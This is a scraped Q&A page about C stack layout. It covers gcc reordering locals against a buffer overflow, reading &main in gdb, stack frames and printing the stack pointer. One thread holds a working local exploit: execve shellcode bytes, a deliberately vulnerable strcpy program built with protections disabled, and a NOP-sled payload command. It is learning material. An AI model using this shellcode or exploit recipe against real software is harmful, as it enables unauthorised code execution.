Is gcc reordering local variables at compilation time? - c

I'm currently reading (for the second time) "Hacking : The Art of Exploitation" and have stumbled on something.
The book suggests two different ways to exploit these two similar programs : auth_overflow and auth_overflow2
In the first one, there is a password checking function layed out like this
int check_authentication(char *password) {
int auth_flag = 0;
char password_buffer[16];
strcpy(password_buffer, password);
...
}
Inputing more than 16 ASCII characters will change the value of auth_flag to something greater than 0, thus bypassing the check, as shown on this gdb output:
gdb$ x/12x $esp
0xbffff400: 0xffffffff 0x0000002f 0xb7e0fd24 0x41414141
0xbffff410: 0x41414141 0x41414141 0x41414141 0x00000001
0xbffff420: 0x00000002 0xbffff4f4 0xbffff448 0x08048556
password_buffer # 0xbffff40c
auth_flag # 0xbffff41c
The second program inverts the two variables :
int check_authentication(char *password) {
char password_buffer[16];
int auth_flag = 0;
strcpy(password_buffer, password);
...
}
The author then suggests than it's not possible to overflow into auth_flag, which I really believed. I then proceeded to overflow the buffer, and to my surprise, it still worked. The auth_flag variable was still sitting after the buffer, as you can see on this gdb output:
gdb$ x/12x $esp
0xbffff400: 0xffffffff 0x0000002f 0xb7e0fd24 0x41414141
0xbffff410: 0x41414141 0x41414141 0x41414141 0x00000001
0xbffff420: 0x00000002 0xbffff4f4 0xbffff448 0x08048556
password_buffer # 0xbffff40c
auth_flag # 0xbffff41c
I'm wondering if gcc is not reordering local variables for alignement/optimization purposes.
I tried to compile using -O0 flag, but the result is the same.
Does one of you knows why is this happening ?
Thanks in advance.

The compiler authors are completely free to implement any allocation scheme for local variables with automatic storage. auth_flag could be set before or after password_buffer on the stack, it could be in a register, it could be elided completely if proper analysis of the code allows it. There might not even be a stack... The only guarantee the Standard gives you is this:
strcpy(password_buffer, password); invokes undefined behavior if the source string including its null terminator is longer than the destination array password_buffer. Whether this undefined behavior fits your needs is completely outside of the language specification.
As a matter of fact, some implementors purposely complicate the task of would be hackers by randomizing the behavior in cases such as the posted code.

I had the same problem. In order to fix this, put the two variables in a struct. In a struct the fields are always located as defined in the struct. Be aware that the order is reversed.
struct myStruct {
int auth_flag;
char password_buffer[16];
};

I know thats an old question.
But in my case -fno-stack-protector flag did the trick.
So if I compile with -fno-stack-protector, local variables ordered as excepted (at least for this simple program ).
I wonder, maybe reordering can be some sort of protection.
Here I found link about that

Related

What is in the address of main?

A simple piece of code like this
#include<stdio.h>
int main()
{
return 0;
}
check the value in "&main" with gdb,I got 0xe5894855, I wonder what's this?
(gdb) x/x &main
0x401550 <main>: 0xe5894855
(gdb)
(gdb) x/x &main
0x401550 <main>: 0xe5894855
(gdb)
0xe5894855 is hex opcodes of the first instructions in main, but since you used x/x now gdb is displaying it as just a hex number and is backwards due to x86-64 being little-endian. 55 is the opcode for push rbp and the first instruction of main. Use x/i &main to view the instructions.
check the value in "&main" with gdb,I got 0xe5894855, I wonder what's this?
The C expression &main evaluates to a pointer to (function) main.
The gdb command
x/x &main
prints (eXamines) the value stored at the address expressed by &main, in hexadecimal format (/x). The result in your case is 0xe5894855, but the C language does not specify the significance of that value. In fact, C does not define any strictly conforming way even to read it from inside the program.
In practice, that value probably represents the first four bytes of the function's machine code, interpreted as a four-byte unsigned integer in native byte order. But that depends on implementation details both of GDB of the C implementation involved.
Ok so the 0x401550 is the address of main() and the hex goo to the right is the "contents" of that address, which doesn't make much sense since it's code stored there, not data.
To explain what that hex goo is coming from, we can toy around with some artificial examples:
#include <stdio.h>
int main (void)
{
printf("%llx\n", (unsigned long long)&main);
}
Running this code on gcc x86_64, I get 401040 which is the address of main() on my particular system (this time). Then upon modifying the example into some ugly hard coding:
#include <stdio.h>
int main (void)
{
printf("%llx\n", (unsigned long long)&main);
printf("%.8x\n", *(unsigned int*)0x401040);
}
(Please note that accessing absolute addresses of program code memory like this is dirty hacking. It is very questionable practice and some systems might toss out an hardware exception if you attempt it.)
I get
401040
08ec8348
The gibberish second line is something similar to what gdb would give: the raw op codes for the instructions stored there.
(That is, it's actually a program that prints out the machine code used for printing out the machine code... and now my head hurts...)
Upon disassembly and generating a binary of the executable, then viewing numerical op codes with annotated assembly, I get:
main:
48 83 ec 08
401040 sub rsp,0x8
Where the 48 83 ec 08 is the raw machine code, including the instruction sub with its parameters (x86 assembler isn't exactly my forte, but I believe 48 is "REX prefix" and 83 is the op code for sub). Upon attempting to print this as if it was integer data rather than machine code, it got tossed around according to x86 little endian ordering from 48 83 ec 08 to 08 ec 83 48. And that's the hex gibberish 08ec8348 from before.

Buffer Overflow not spawning shell?

(I know, Too many answers already, but need help)
As far as I know a buffer overflow can be protected by either ASLR, memory canaries, or non-executable stack. so for my testing purpose, I disabled ASLR with following sysctl -w kernel.randomize_va_space=0, disabled program canaries with following -fno-stack-protector and made the stack executable with following -z execstack.
Now to confirm these I did:
ASLR
root#kali:/tmp# cat /proc/sys/kernel/randomize_va_space
0
Executable stack: readelf -l vuln2
GNU_STACK 0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 RWE 0x10
Other info that might help:
root#kali:/tmp# file vuln2
vuln2: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=8102b60ffa8c26f231e4184d2f49b2e7c26a18b9, not stripped
CPU architecture is little endian:
root#kali:/tmp# lscpu | grep 'Byte Order'
Byte Order: Little Endian
program:
#include <stdio.h>
int main(int argc, char *argv[]){
char buf[512];
strcpy(buf, argv[1]);
return 0;
}
Compilation:
gcc -o vuln2 vuln2.c -fno-stack-protector -z execstack
Shellcode: is 25 bytes
\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x31\xc0\x99\x31\xf6\x54\x5f\xb0\x3b\x0f\x05
does the shellcode work though? Yes, yes it does, compiling this spawn a shell:
#include <sys/mman.h>
#include <stdint.h>
char code[] = "\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x31\xc0\x99\x31\xf6\x54\x5f\xb0\x3b\x0f\x05";
int main(){
mprotect((void *)((uint64_t)code & ~4095), 4096, PROT_READ|PROT_EXEC);
(*(void(*)()) code)();
return 0;
}
How do I exploit it?
well I need 526 bytes to overwrite RIP:
(gdb) r $(python -c 'print "A"*526')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /tmp/vuln2 $(python -c 'print "A"*526')
Program received signal SIGSEGV, Segmentation fault.
0x0000414141414141 in ?? ()
(gdb) x/x $rip
0x414141414141: Cannot access memory at address 0x414141414141
Stack start address: 0x7fffffffdd70
(gdb) x/100x $rsp
0x7fffffffdd60: 0xffffe058 0x00007fff 0xf7fd3298 0x00000002
0x7fffffffdd70: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffdd80: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffdd90: 0x41414141 0x41414141 0x41414141 0x41414141
RBP Address:
(gdb) x/x $rbp
0x7fffffffdf70: 0x41414141
now in order to exploit the stack we minus 6 from 526 which will be replaced with return address and minus 25 which is the shellcode, so totall 526-6-25=495
Final Exploit:
(gdb) r $(python -c 'print "\x90"*495+"\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x31\xc0\x99\x31\xf6\x54\x5f\xb0\x3b\x0f\x05"+"\x90\xdd\xff\xff\xff\x7f"')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /tmp/vuln2 $(python -c 'print "\x90"*495+"\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x31\xc0\x99\x31\xf6\x54\x5f\xb0\x3b\x0f\x05"+"\x90\xdd\xff\xff\xff\x7f"')
Program received signal SIGILL, Illegal instruction.
0x00007fffffffdf73 in ?? ()
Is there any mistake that I am making?
1)I have same issue. It's happening when return address on the stack is
modifying by shellcode and the address replaced does not belong to valid
addresses.
After you get this error, type x/400xw $rsp , choose valid address and correct
padding, from stack.
You're welcome.
0x00007fffffffdf73 cannot be a valid address because you are in 64 bits mode
and this address isn't 8 bytes aligned.
no word starts from this address.
For example,
0x7fffffffdf70: 0x41414141 0x41414141 0x41414141 0x41414141
If you try to access to 0x7fffffffdf73 , you retrieve a first word (from left) and 3-nth byte from right
(because little endian, MSB is on the right) .
So, you have to choose an address like 0x7fffffffdf70 or 0x7fffffffdf74 or
0x7fffffffdf78 etc... (last digit of address multiple of 4)

Different buffer length in gdb

I am trying to exploit the following program :
#include <string.h>
int main(int argc, char *argv[]) {
char little_array[512];
if (argc > 1)
strcpy(little_array, argv[1]);
}
I want to first find the buffer length in order to overflow the stack so I use
(gdb) x/20xw $esp-532
0xffffcda8: 0x00000001 0x00000000 0x41414141 0x41414141
0xffffcdb8: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffcdc8: 0x00000041 0xf7fe6b8c 0xf7ffd000 0x00000000
0xffffcdd8: 0xffffce98 0xf7fe70db 0xf7ffdaf0 0xf7fd8e08
0xffffcde8: 0x00000001 0x00000001 0x00000000 0xf7ff55ac
(gdb)
And I find the address (since I ran 'AAAA'), so the address is 0xffffcdaa .
Im running a 64bit system, disabled ASLR.
And I defined the buffer 512 bytes long.
And I get
(gdb) p 0xffffddf0 - 0xffffcdaa
$1 = 4166
(gdb)
How can this be? It has something to do with my 64bit system? Im trying to follow an old book and cant really find anything better.
I used this program to find the starting point
// find_start.c
unsigned long find_start(void)
{
__asm__("movl %esp, %eax");
}
int main()
{
printf("0x%x\n",find_start());
}
(when this program compiled with the -m32 flag the output of it gives me a starting point that gives me a little better result, 574, but still is too far)

How does the stack frame look like in my function?

I am a beginner at assembly, and I am curious to know how the stack frame looks like here, so I could access the argument by understanding and not algorithm.
P.S.: the assembly function is process
#include <stdio.h>
# define MAX_LEN 120 // Maximal line size
extern int process(char*);
int main(void) {
char buf[MAX_LEN];
int str_len = 0;
printf("Enter a string:");
fgets(buf, MAX_LEN, stdin);
str_len = process(buf);
So, I know that when I want to access the process function's argument, which is in assembly, I have to do the following:
push ebp
mov ebp, esp ; now ebp is pointing to the same address as esp
pushad
mov ebx, dword [ebp+8]
Now I also would like someone to correct me on things I think are correct:
At the start, esp is pointing to the return address of the function, and [esp+8] is the slot in the stack under it, which is the function's argument
Since the function process has one argument and no inner declarations (not sure about the declarations) then the stack frame, from high to low, is 8 bytes for the argument, 8 bytes for the return address.
Thank you.
There's no way to tell other than by means of debugger. You are using ia32 conventions (ebp, esp) instead of x64 (rbp, rsp), but expecting int / addresses to be 64 bit. It's possible, but not likely.
Compile the program (gcc -O -g foo.c), then run with gdb a.out
#include <stdio.h>
int process(char* a) { printf("%p", (void*)a); }
int main()
{
process((char *)0xabcd1234);
}
Break at process; run; disassemble; inspect registers values and dump the stack.
- break process
- run
- disassemble
- info frame
- info args
- info registers
- x/32x $sp - 16 // to dump stack +-16 bytes in both side of stack pointer
Then add more parameters, a second subroutine or local variables with known values. Single step to the printf routine. What does the stack look like there?
You can also use gdb as calculator: what is the difference in between sp and rax ?
It's print $sp - $rax if you ever want to know.
Tickle your compiler to produce assembler output (on Unixy systems usually with the -S flag). Play around with debugging/non-debugging flags, the extra hints for the debugger might help in refering back to the source. Don't give optimization flags, the reorganizing done by the compiler can lead to thorough confusion. Add a simple function calling into your code to see how it is set up and torn down too.

Print out value of stack pointer

How can I print out the current value at the stack pointer in C in Linux (Debian and Ubuntu)?
I tried google but found no results.
One trick, which is not portable or really even guaranteed to work, is to simple print out the address of a local as a pointer.
void print_stack_pointer() {
void* p = NULL;
printf("%p", (void*)&p);
}
This will essentially print out the address of p which is a good approximation of the current stack pointer
There is no portable way to do that.
In GNU C, this may work for target ISAs that have a register named SP, including x86 where gcc recognizes "SP" as short for ESP or RSP.
// broken with clang, but usually works with GCC
register void *sp asm ("sp");
printf("%p", sp);
This usage of local register variables is now deprecated by GCC:
The only supported use for this feature is to specify registers for input and output operands when calling Extended asm
Defining a register variable does not reserve the register. Other than when invoking the Extended asm, the contents of the specified register are not guaranteed. For this reason, the following uses are explicitly not supported. If they appear to work, it is only happenstance, and may stop working as intended due to (seemingly) unrelated changes in surrounding code, or even minor changes in the optimization of a future version of gcc. ...
It's also broken in practice with clang where sp is treated like any other uninitialized variable.
In addition to duedl0r's answer with specifically GCC you could use __builtin_frame_address(0) which is GCC specific (but not x86 specific).
This should also work on Clang (but there are some bugs about it).
Taking the address of a local (as JaredPar answered) is also a solution.
Notice that AFAIK the C standard does not require any call stack in theory.
Remember Appel's paper: garbage collection can be faster than stack allocation; A very weird C implementation could use such a technique! But AFAIK it has never been used for C.
One could dream of a other techniques. And you could have split stacks (at least on recent GCC), in which case the very notion of stack pointer has much less sense (because then the stack is not contiguous, and could be made of many segments of a few call frames each).
On Linuxyou can use the proc pseudo-filesystem to print the stack pointer.
Have a look here, at the /proc/your-pid/stat pseudo-file, at the fields 28, 29.
startstack %lu
The address of the start (i.e., bottom) of the
stack.
kstkesp %lu
The current value of ESP (stack pointer), as found
in the kernel stack page for the process.
You just have to parse these two values!
You can also use an extended assembler instruction, for example:
#include <stdint.h>
uint64_t getsp( void )
{
uint64_t sp;
asm( "mov %%rsp, %0" : "=rm" ( sp ));
return sp;
}
For a 32 bit system, 64 has to be replaced with 32, and rsp with esp.
You have that info in the file /proc/<your-process-id>/maps, in the same line as the string [stack] appears(so it is independent of the compiler or machine). The only downside of this approach is that for that file to be read it is needed to be root.
Try lldb or gdb. For example we can set backtrace format in lldb.
settings set frame-format "frame #${frame.index}: ${ansi.fg.yellow}${frame.pc}: {pc:${frame.pc},fp:${frame.fp},sp:${frame.sp}} ${ansi.normal}{ ${module.file.basename}{\`${function.name-with-args}{${frame.no-debug}${function.pc-offset}}}}{ at ${ansi.fg.cyan}${line.file.basename}${ansi.normal}:${ansi.fg.yellow}${line.number}${ansi.normal}{:${ansi.fg.yellow}${line.column}${ansi.normal}}}{${function.is-optimized} [opt]}{${frame.is-artificial} [artificial]}\n"
So we can print the bp , sp in debug such as
frame #10: 0x208895c4: pc:0x208895c4,fp:0x01f7d458,sp:0x01f7d414 UIKit`-[UIApplication _handleDelegateCallbacksWithOptions:isSuspended:restoreState:] + 376
Look more at https://lldb.llvm.org/use/formatting.html
You can use setjmp. The exact details are implementation dependent, look in the header file.
#include <setjmp.h>
jmp_buf jmp;
setjmp(jmp);
printf("%08x\n", jmp[0].j_esp);
This is also handy when executing unknown code. You can check the sp before and after and do a longjmp to clean up.
If you are using msvc you can use the provided function _AddressOfReturnAddress()
It'll return the address of the return address, which is guaranteed to be the value of RSP at a functions' entry. Once you return from that function, the RSP value will be increased by 8 since the return address is pop'ed off.
Using that information, you can write a simple function that return the current address of the stack pointer like this:
uintptr_t GetStackPointer() {
return (uintptr_t)_AddressOfReturnAddress() + 0x8;
}
int main(int argc, const char argv[]) {
uintptr_t rsp = GetStackPointer();
printf("Stack pointer: %p\n", rsp);
}
Showcase
You may use the following:
uint32_t msp_value = __get_MSP(); // Read Main Stack pointer
By the same way if you want to get the PSP value:
uint32_t psp_value = __get_PSP(); // Read Process Stack pointer
If you want to use assembly language, you can also use MSP and PSP process:
MRS R0, MSP // Read Main Stack pointer to R0
MRS R0, PSP // Read Process Stack pointer to R0

Resources